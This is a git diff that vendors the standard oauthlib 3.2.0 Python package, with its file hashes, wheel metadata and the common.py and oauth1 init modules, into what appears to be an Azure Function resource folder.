+oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/access_token.py,sha256=CRgLV5DqDiwVvbo8MiHySbTEKrxETJV29-VGu-2kQ7Y,9347 +oauthlib/oauth1/rfc5849/endpoints/authorization.py,sha256=zbU7TzO6nB6853UIqtTkhxUV-JTHOdOc-CvdQsIQKWk,6724 +oauthlib/oauth1/rfc5849/endpoints/base.py,sha256=pBOS1MqIrJVxydTD6jnzZcGZRh_NMbRmT1c_c2ISKVs,11643 +oauthlib/oauth1/rfc5849/endpoints/pre_configured.py,sha256=Ie5oBUq_JTsXQdvfWhcMRjhH3OOxS_mRHbKBQ9TpsGg,543 +oauthlib/oauth1/rfc5849/endpoints/request_token.py,sha256=Nz-d7ShVB5Hlh9cAKTp-KHeHH_t5f7khvtCVT8avM9Q,9293 +oauthlib/oauth1/rfc5849/endpoints/resource.py,sha256=rmzBuF0FyrLTpaAehFx0wkj0laAoe7XTdbbeRTrUCZQ,7376 +oauthlib/oauth1/rfc5849/endpoints/signature_only.py,sha256=MX5zV66v4-wrR4cu7OmOd_GF3L8ysM60HmEiHtRR0l8,3327 +oauthlib/oauth1/rfc5849/errors.py,sha256=WPvKVjPlgkCYp6TXvcwC8VETkhsZBzphKCkTJKDPNfM,2474 +oauthlib/oauth1/rfc5849/parameters.py,sha256=Abnxpix_Yy7P3A3vbkrV2bkFxtnR5TRTTKdOu9MKydo,4802 +oauthlib/oauth1/rfc5849/request_validator.py,sha256=x1c8EdFxdvSvilHQ_ZavkiSDjPy6gkYb0gMhXqLr7cw,30988 +oauthlib/oauth1/rfc5849/signature.py,sha256=FBrizlpvzlHjsJbT3AMmYOyBD_OnpOeEdSxXCg-1iAY,32024 +oauthlib/oauth1/rfc5849/utils.py,sha256=IapG_jM6iMe4e0DYWWds1jp-wce2Lf_cuhFrtCP_2ls,2613 +oauthlib/oauth2/__init__.py,sha256=uPkdHF2NEpIM6Ybz-jPPEKU5e56eHptaOz2NPwppyys,1597 +oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__init__.py,sha256=sJcxfdG6HTloXzhkG8-PTJTVQWoCeNtnw6ODNCJNw58,404 +oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__init__.py,sha256=TuYtiErfo0_Ej0816tIv5rBsrwA9BjYz3tu_ZM0X364,504 +oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/backend_application.py,sha256=CAhmHPY3vJ1-McjrMQ4TgJXXqx2Ls9PLfuPWUV0JEtY,3223 +oauthlib/oauth2/rfc6749/clients/base.py,sha256=q1_tKeEE-3KBUxUrIneMXabiBK9T9iGr9aXaowdPB6E,26575 +oauthlib/oauth2/rfc6749/clients/legacy_application.py,sha256=FVDcZNyJK-uSSAPJUQMM3Ud_-EAzJJ8pZ5rr937c7NY,4031 +oauthlib/oauth2/rfc6749/clients/mobile_application.py,sha256=nuM6Gp7jZtY6xP85j1hQUp1nvW_6MpM_dK3wJntKxb4,8877 +oauthlib/oauth2/rfc6749/clients/service_application.py,sha256=fBxB-eY6kG1NKrl5jGfFCJFAJt_PJP8opUdRKY7sojA,7810 +oauthlib/oauth2/rfc6749/clients/web_application.py,sha256=2wtPArVJipR0n3kSCDca-V2SQuVPl4PhGWl57LiOxDo,12086 +oauthlib/oauth2/rfc6749/endpoints/__init__.py,sha256=RL_txhULl35A74dbvlJ7nvqwp3GMCSCpg_4TvjoO-Xk,553 +oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc,, 
+oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/authorization.py,sha256=2N2Cb_TQtpUPcqDIclsJnZERtaMKmH9uSgGoMZLFnUI,4584 +oauthlib/oauth2/rfc6749/endpoints/base.py,sha256=fUhCGaftD5bm5PstA6L2CqUNb9kHDpUj4_BsvLRbi4w,4130 +oauthlib/oauth2/rfc6749/endpoints/introspect.py,sha256=SGVI0jI1KmstheTNxMWfngNWCtvdkNTi-H_o3MRQvHE,4983 +oauthlib/oauth2/rfc6749/endpoints/metadata.py,sha256=ySOnnACtwTCjXmojYwZA_EC3EU7OMBlJ117x9P9xxuM,10516 +oauthlib/oauth2/rfc6749/endpoints/pre_configured.py,sha256=ChhORao78XGGlnikJsLb6d_FZvKaLGBUM-te-84NeJ8,11954 +oauthlib/oauth2/rfc6749/endpoints/resource.py,sha256=vpXoovgpmByY-IuW0PDccS5IJGFoFiLVjLLUpGFmXX4,3248 +oauthlib/oauth2/rfc6749/endpoints/revocation.py,sha256=hH3F2G3-QmqCQ1tE4yN2AQfaQ2lEB46YkO5-n1ophGE,5212 +oauthlib/oauth2/rfc6749/endpoints/token.py,sha256=iJDlaSkVR8U6s1_T9fiyVnLgfCgOWsq9PFDcmzL74H4,4595 +oauthlib/oauth2/rfc6749/errors.py,sha256=5EE4Qs3ru34d33wqaFo-WGOofLLYK1jTov9sqG92CW0,12947 +oauthlib/oauth2/rfc6749/grant_types/__init__.py,sha256=im_XwEWmw3dhmzcdfyhkN38xZopBhL3cRShmmCtqQs0,368 +oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/authorization_code.py,sha256=R2cXCtdGfDkKseYu-raoZkOpc7lnMa2oVRBs-C3jGKs,26858 +oauthlib/oauth2/rfc6749/grant_types/base.py,sha256=BMcu0_Ks0khfp0B0w2t8CgT6hx9YDjUtkIx95fHf8MM,10213 +oauthlib/oauth2/rfc6749/grant_types/client_credentials.py,sha256=Wr0CpWDVmHrIfOBPTYp9RxnISTfYdp5SjSaRAu77vUY,5079 +oauthlib/oauth2/rfc6749/grant_types/implicit.py,sha256=hYAEYOwToxo3eNpGRC9SyJue93tu37jZVL7MYiaErDs,16852 +oauthlib/oauth2/rfc6749/grant_types/refresh_token.py,sha256=OW0mI-sUPfiTD2UaiZEv8kdpp6QGVSRJEvopJyuRELw,5832 +oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py,sha256=9FsDbrSNNylWKkEvgdafJDzlNncTRCOhIZODo-f4ZIM,8516 +oauthlib/oauth2/rfc6749/parameters.py,sha256=WYiyVkEfKS66fXpyczcard3bDaMHy0h1H5l2PUtUY_c,19016 +oauthlib/oauth2/rfc6749/request_validator.py,sha256=CduQ-_Utp1_LrHNDhrC_zx6KMrNFVAVNB8e5_vVziWw,28814 +oauthlib/oauth2/rfc6749/tokens.py,sha256=H6QOIMNGXFEhDeBfOdK2I_UparP5KRrz55SZQJ4WpVY,11097 +oauthlib/oauth2/rfc6749/utils.py,sha256=EKlU_U-FcYkdd8PvXo1irtHTqBXF7gKqdFKBadteZ64,2207 +oauthlib/oauth2/rfc8628/__init__.py,sha256=yfG2QHuDxrp7_9HNKPEeXYXA_qBVZqiRrhI7q2cG4NM,232 +oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/__init__.py,sha256=indCdGycy9cekvLOBxYbCwtyezEVhl3uKZzoShml-aY,201 
+oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/device.py,sha256=DjDTy51Vxyl28u5sQGB2UsPzr-VAFNO52okuOtw5BcQ,3878 +oauthlib/openid/__init__.py,sha256=qZQCKCdQt40myte_nxSYrWvzf1VVADqRl8om0-t6LzE,162 +oauthlib/openid/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/__init__.py,sha256=nQ6mGniUaM9X1ENG0tZlPgWgbLdlFESWGK-5_e8mp5Y,229 +oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/pre_configured.py,sha256=p4Bq4HHUTvCBYXlTHr3PXktABKjHFGC3yBmwxWifzKc,5426 +oauthlib/openid/connect/core/endpoints/userinfo.py,sha256=gTO5BHp4evBqI9CcQKQzJNFs1rx8QJLlBtfo7S67s0I,3847 +oauthlib/openid/connect/core/exceptions.py,sha256=uMMjE7VMc16jyL7TIhpbCx48_MsHD2C_atoMIemBKVA,4790 +oauthlib/openid/connect/core/grant_types/__init__.py,sha256=geSZh6OFlupoC2tg9Bqqsnd31nu1-EheWNobzu86ZqU,426 +oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/authorization_code.py,sha256=WOlS5RlSjIk2VNNmC5O4svxfTeUJiXpL3o5Mqn5EULk,1441 +oauthlib/openid/connect/core/grant_types/base.py,sha256=StMSoCD-lrv-01GZMLKdLMvTlAg-VkQ0lw4jdhVOEms,15386 +oauthlib/openid/connect/core/grant_types/dispatchers.py,sha256=kgYI3SpTZd796N_bnkqdaTDis_WmwhzkcMS9Avw_1zM,3979 +oauthlib/openid/connect/core/grant_types/hybrid.py,sha256=PHWBazxe3qpJq02rpU93jaK7URxI_r1zl0Ee4ibcaPA,2742 +oauthlib/openid/connect/core/grant_types/implicit.py,sha256=UICxnDNoePZfTUbL5QCBWA231o8XIQEnxocSrPp9gzw,1971 +oauthlib/openid/connect/core/grant_types/refresh_token.py,sha256=8X0i1EHLgBIrlqP10rwJ5lXWO3f8iupmfn2E6DlLmnw,1035 +oauthlib/openid/connect/core/request_validator.py,sha256=-lo1BnAhMWVkCj2Qhpn22LbV6CDmx4Nh4tCOntCg9tQ,13767 +oauthlib/openid/connect/core/tokens.py,sha256=uiHwpFiVhaQDFdKizV74AcBPuEiHxZQ9mtZ8n5KfvFU,1596 +oauthlib/signals.py,sha256=_PKDXWqKW6X3IbQUxGqW4eJ5Yi3p8jdOqXPAKfI956E,1489 +oauthlib/uri_validate.py,sha256=XLEO1mSoXK5j9kYA12JxnTktWhsJH40mPJ9m8q7jDYw,6107 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL new file mode 100644 
index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt new file mode 100644 index 0000000..14c0294 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt @@ -0,0 +1 @@ +oauthlib diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py new file mode 100644 index 0000000..2982ba0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py @@ -0,0 +1,34 @@ +""" + oauthlib + ~~~~~~~~ + + A generic, spec-compliant, thorough implementation of the OAuth + request-signing logic. + + :copyright: (c) 2019 by The OAuthlib Community + :license: BSD, see LICENSE for details. +""" +import logging +from logging import NullHandler + +__author__ = 'The OAuthlib Community' +__version__ = '3.2.0' + +logging.getLogger('oauthlib').addHandler(NullHandler()) + +_DEBUG = False + +def set_debug(debug_val): + """Set value of debug flag + + :param debug_val: Value to set. Must be a bool value. + """ + global _DEBUG + _DEBUG = debug_val + +def get_debug(): + """Get debug mode value. + + :return: `True` if debug mode is on, `False` otherwise + """ + return _DEBUG diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b495b30 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc new file mode 100644 index 0000000..3bb8b8d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc new file mode 100644 index 0000000..8df25b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc new file mode 100644 
index 0000000..bcaeb7b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py new file mode 100644 index 0000000..013f4ad --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py @@ -0,0 +1,434 @@ +""" +oauthlib.common +~~~~~~~~~~~~~~ + +This module provides data structures and utilities common +to all implementations of OAuth. +""" +import collections +import datetime +import logging +import re +import time +import urllib.parse as urlparse +from urllib.parse import ( + quote as _quote, unquote as _unquote, urlencode as _urlencode, +) + +from . import get_debug + +try: + from secrets import randbits + from secrets import SystemRandom +except ImportError: + from random import getrandbits as randbits + from random import SystemRandom + +UNICODE_ASCII_CHARACTER_SET = ('abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789') + +CLIENT_ID_CHARACTER_SET = (r' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMN' + 'OPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}') + +SANITIZE_PATTERN = re.compile(r'([^&;]*(?:password|token)[^=]*=)[^&;]+', re.IGNORECASE) +INVALID_HEX_PATTERN = re.compile(r'%[^0-9A-Fa-f]|%[0-9A-Fa-f][^0-9A-Fa-f]') + +always_safe = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789' '_.-') + +log = logging.getLogger('oauthlib') + + +# 'safe' must be bytes (Python 2.6 requires bytes, other versions allow either) +def quote(s, safe=b'/'): + s = s.encode('utf-8') if isinstance(s, str) else s + s = _quote(s, safe) + # PY3 always returns unicode. PY2 may return either, depending on whether + # it had to modify the string. + if isinstance(s, bytes): + s = s.decode('utf-8') + return s + + +def unquote(s): + s = _unquote(s) + # PY3 always returns unicode. PY2 seems to always return what you give it, + # which differs from quote's behavior. Just to be safe, make sure it is + # unicode before we return. + if isinstance(s, bytes): + s = s.decode('utf-8') + return s + + +def urlencode(params): + utf8_params = encode_params_utf8(params) + urlencoded = _urlencode(utf8_params) + if isinstance(urlencoded, str): + return urlencoded + else: + return urlencoded.decode("utf-8") + + +def encode_params_utf8(params): + """Ensures that all parameters in a list of 2-element tuples are encoded to + bytestrings using UTF-8 + """ + encoded = [] + for k, v in params: + encoded.append(( + k.encode('utf-8') if isinstance(k, str) else k, + v.encode('utf-8') if isinstance(v, str) else v)) + return encoded + + +def decode_params_utf8(params): + """Ensures that all parameters in a list of 2-element tuples are decoded to + unicode using UTF-8. + """ + decoded = [] + for k, v in params: + decoded.append(( + k.decode('utf-8') if isinstance(k, bytes) else k, + v.decode('utf-8') if isinstance(v, bytes) else v)) + return decoded + + +urlencoded = set(always_safe) | set('=&;:%+~,*@!()/?\'$') + + +def urldecode(query): + """Decode a query string in x-www-form-urlencoded format into a sequence + of two-element tuples. + + Unlike urlparse.parse_qsl(..., strict_parsing=True) urldecode will enforce + correct formatting of the query string by validation. If validation fails + a ValueError will be raised. 
urllib.parse_qsl will only raise errors if + any of name-value pairs omits the equals sign. + """ + # Check if query contains invalid characters + if query and not set(query) <= urlencoded: + error = ("Error trying to decode a non urlencoded string. " + "Found invalid characters: %s " + "in the string: '%s'. " + "Please ensure the request/response body is " + "x-www-form-urlencoded.") + raise ValueError(error % (set(query) - urlencoded, query)) + + # Check for correctly hex encoded values using a regular expression + # All encoded values begin with % followed by two hex characters + # correct = %00, %A0, %0A, %FF + # invalid = %G0, %5H, %PO + if INVALID_HEX_PATTERN.search(query): + raise ValueError('Invalid hex encoding in query string.') + + # We want to allow queries such as "c2" whereas urlparse.parse_qsl + # with the strict_parsing flag will not. + params = urlparse.parse_qsl(query, keep_blank_values=True) + + # unicode all the things + return decode_params_utf8(params) + + +def extract_params(raw): + """Extract parameters and return them as a list of 2-tuples. + + Will successfully extract parameters from urlencoded query strings, + dicts, or lists of 2-tuples. Empty strings/dicts/lists will return an + empty list of parameters. Any other input will result in a return + value of None. + """ + if isinstance(raw, (bytes, str)): + try: + params = urldecode(raw) + except ValueError: + params = None + elif hasattr(raw, '__iter__'): + try: + dict(raw) + except ValueError: + params = None + except TypeError: + params = None + else: + params = list(raw.items() if isinstance(raw, dict) else raw) + params = decode_params_utf8(params) + else: + params = None + + return params + + +def generate_nonce(): + """Generate pseudorandom nonce that is unlikely to repeat. + + Per `section 3.3`_ of the OAuth 1 RFC 5849 spec. + Per `section 3.2.1`_ of the MAC Access Authentication spec. + + A random 64-bit number is appended to the epoch timestamp for both + randomness and to decrease the likelihood of collisions. + + .. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1 + .. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3 + """ + return str(str(randbits(64)) + generate_timestamp()) + + +def generate_timestamp(): + """Get seconds since epoch (UTC). + + Per `section 3.3`_ of the OAuth 1 RFC 5849 spec. + Per `section 3.2.1`_ of the MAC Access Authentication spec. + + .. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1 + .. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3 + """ + return str(int(time.time())) + + +def generate_token(length=30, chars=UNICODE_ASCII_CHARACTER_SET): + """Generates a non-guessable OAuth token + + OAuth (1 and 2) does not specify the format of tokens except that they + should be strings of random characters. Tokens should not be guessable + and entropy when generating the random characters is important. Which is + why SystemRandom is used instead of the default random.choice method. 
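+
+    Illustrative example (the output is random, so only its length and
+    alphabet are stable)::
+
+        >>> token = generate_token(length=40)
+        >>> len(token)
+        40
+        >>> all(c in UNICODE_ASCII_CHARACTER_SET for c in token)
+        True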
+ """ + rand = SystemRandom() + return ''.join(rand.choice(chars) for x in range(length)) + + +def generate_signed_token(private_pem, request): + import jwt + + now = datetime.datetime.utcnow() + + claims = { + 'scope': request.scope, + 'exp': now + datetime.timedelta(seconds=request.expires_in) + } + + claims.update(request.claims) + + token = jwt.encode(claims, private_pem, 'RS256') + token = to_unicode(token, "UTF-8") + + return token + + +def verify_signed_token(public_pem, token): + import jwt + + return jwt.decode(token, public_pem, algorithms=['RS256']) + + +def generate_client_id(length=30, chars=CLIENT_ID_CHARACTER_SET): + """Generates an OAuth client_id + + OAuth 2 specify the format of client_id in + https://tools.ietf.org/html/rfc6749#appendix-A. + """ + return generate_token(length, chars) + + +def add_params_to_qs(query, params): + """Extend a query with a list of two-tuples.""" + if isinstance(params, dict): + params = params.items() + queryparams = urlparse.parse_qsl(query, keep_blank_values=True) + queryparams.extend(params) + return urlencode(queryparams) + + +def add_params_to_uri(uri, params, fragment=False): + """Add a list of two-tuples to the uri query components.""" + sch, net, path, par, query, fra = urlparse.urlparse(uri) + if fragment: + fra = add_params_to_qs(fra, params) + else: + query = add_params_to_qs(query, params) + return urlparse.urlunparse((sch, net, path, par, query, fra)) + + +def safe_string_equals(a, b): + """ Near-constant time string comparison. + + Used in order to avoid timing attacks on sensitive information such + as secret keys during request verification (`rootLabs`_). + + .. _`rootLabs`: http://rdist.root.org/2010/01/07/timing-independent-array-comparison/ + + """ + if len(a) != len(b): + return False + + result = 0 + for x, y in zip(a, b): + result |= ord(x) ^ ord(y) + return result == 0 + + +def to_unicode(data, encoding='UTF-8'): + """Convert a number of different types of objects to unicode.""" + if isinstance(data, str): + return data + + if isinstance(data, bytes): + return str(data, encoding=encoding) + + if hasattr(data, '__iter__'): + try: + dict(data) + except TypeError: + pass + except ValueError: + # Assume it's a one dimensional data structure + return (to_unicode(i, encoding) for i in data) + else: + # We support 2.6 which lacks dict comprehensions + if hasattr(data, 'items'): + data = data.items() + return {to_unicode(k, encoding): to_unicode(v, encoding) for k, v in data} + + return data + + +class CaseInsensitiveDict(dict): + + """Basic case insensitive dict with strings only keys.""" + + proxy = {} + + def __init__(self, data): + self.proxy = {k.lower(): k for k in data} + for k in data: + self[k] = data[k] + + def __contains__(self, k): + return k.lower() in self.proxy + + def __delitem__(self, k): + key = self.proxy[k.lower()] + super().__delitem__(key) + del self.proxy[k.lower()] + + def __getitem__(self, k): + key = self.proxy[k.lower()] + return super().__getitem__(key) + + def get(self, k, default=None): + return self[k] if k in self else default + + def __setitem__(self, k, v): + super().__setitem__(k, v) + self.proxy[k.lower()] = k + + def update(self, *args, **kwargs): + super().update(*args, **kwargs) + for k in dict(*args, **kwargs): + self.proxy[k.lower()] = k + + +class Request: + + """A malleable representation of a signable HTTP request. 
+
+    Body argument may contain any data, but parameters will only be decoded if
+    they are one of:
+
+    * urlencoded query string
+    * dict
+    * list of 2-tuples
+
+    Anything else will be treated as raw body data to be passed through
+    unmolested.
+    """
+
+    def __init__(self, uri, http_method='GET', body=None, headers=None,
+                 encoding='utf-8'):
+        # Convert to unicode using encoding if given, else assume unicode
+        encode = lambda x: to_unicode(x, encoding) if encoding else x
+
+        self.uri = encode(uri)
+        self.http_method = encode(http_method)
+        self.headers = CaseInsensitiveDict(encode(headers or {}))
+        self.body = encode(body)
+        self.decoded_body = extract_params(self.body)
+        self.oauth_params = []
+        self.validator_log = {}
+
+        self._params = {
+            "access_token": None,
+            "client": None,
+            "client_id": None,
+            "client_secret": None,
+            "code": None,
+            "code_challenge": None,
+            "code_challenge_method": None,
+            "code_verifier": None,
+            "extra_credentials": None,
+            "grant_type": None,
+            "redirect_uri": None,
+            "refresh_token": None,
+            "request_token": None,
+            "response_type": None,
+            "scope": None,
+            "scopes": None,
+            "state": None,
+            "token": None,
+            "user": None,
+            "token_type_hint": None,
+
+            # OpenID Connect
+            "response_mode": None,
+            "nonce": None,
+            "display": None,
+            "prompt": None,
+            "claims": None,
+            "max_age": None,
+            "ui_locales": None,
+            "id_token_hint": None,
+            "login_hint": None,
+            "acr_values": None
+        }
+        self._params.update(dict(urldecode(self.uri_query)))
+        self._params.update(dict(self.decoded_body or []))
+
+    def __getattr__(self, name):
+        if name in self._params:
+            return self._params[name]
+        else:
+            raise AttributeError(name)
+
+    def __repr__(self):
+        if not get_debug():
+            return "<oauthlib.Request SANITIZED>"
+        body = self.body
+        headers = self.headers.copy()
+        if body:
+            body = SANITIZE_PATTERN.sub('\1<SANITIZED>', str(body))
+        if 'Authorization' in headers:
+            headers['Authorization'] = '<SANITIZED>'
+        return '<oauthlib.Request url="{}", http_method="{}", headers="{}", body="{}">'.format(
+            self.uri, self.http_method, headers, body)
+
+    @property
+    def uri_query(self):
+        return urlparse.urlparse(self.uri).query
+
+    @property
+    def uri_query_params(self):
+        if not self.uri_query:
+            return []
+        return urlparse.parse_qsl(self.uri_query, keep_blank_values=True,
+                                  strict_parsing=True)
+
+    @property
+    def duplicate_params(self):
+        seen_keys = collections.defaultdict(int)
+        all_keys = (p[0]
+                    for p in (self.decoded_body or []) + self.uri_query_params)
+        for k in all_keys:
+            seen_keys[k] += 1
+        return [k for k, c in seen_keys.items() if c > 1]
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py
new file mode 100644
index 0000000..4944771
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py
@@ -0,0 +1,28 @@
+"""
+oauthlib.oauth1
+~~~~~~~~~~~~~~
+
+This module is a wrapper for the most recent implementation of OAuth 1.0 Client
+and Server classes.
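+
+A hypothetical provider-side setup (``MyValidator`` is a placeholder for your
+own ``RequestValidator`` subclass, not a class shipped with this package)::
+
+    >>> from oauthlib.oauth1 import RequestValidator, WebApplicationServer
+    >>> class MyValidator(RequestValidator):
+    ...     pass
+    >>> server = WebApplicationServer(MyValidator())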
+"""
+from .rfc5849 import Client
+from .rfc5849 import (SIGNATURE_HMAC,
+                      SIGNATURE_HMAC_SHA1,
+                      SIGNATURE_HMAC_SHA256,
+                      SIGNATURE_HMAC_SHA512,
+                      SIGNATURE_RSA,
+                      SIGNATURE_RSA_SHA1,
+                      SIGNATURE_RSA_SHA256,
+                      SIGNATURE_RSA_SHA512,
+                      SIGNATURE_PLAINTEXT)
+from .rfc5849 import SIGNATURE_TYPE_AUTH_HEADER, SIGNATURE_TYPE_QUERY
+from .rfc5849 import SIGNATURE_TYPE_BODY
+from .rfc5849.request_validator import RequestValidator
+from .rfc5849.endpoints import RequestTokenEndpoint, AuthorizationEndpoint
+from .rfc5849.endpoints import AccessTokenEndpoint, ResourceEndpoint
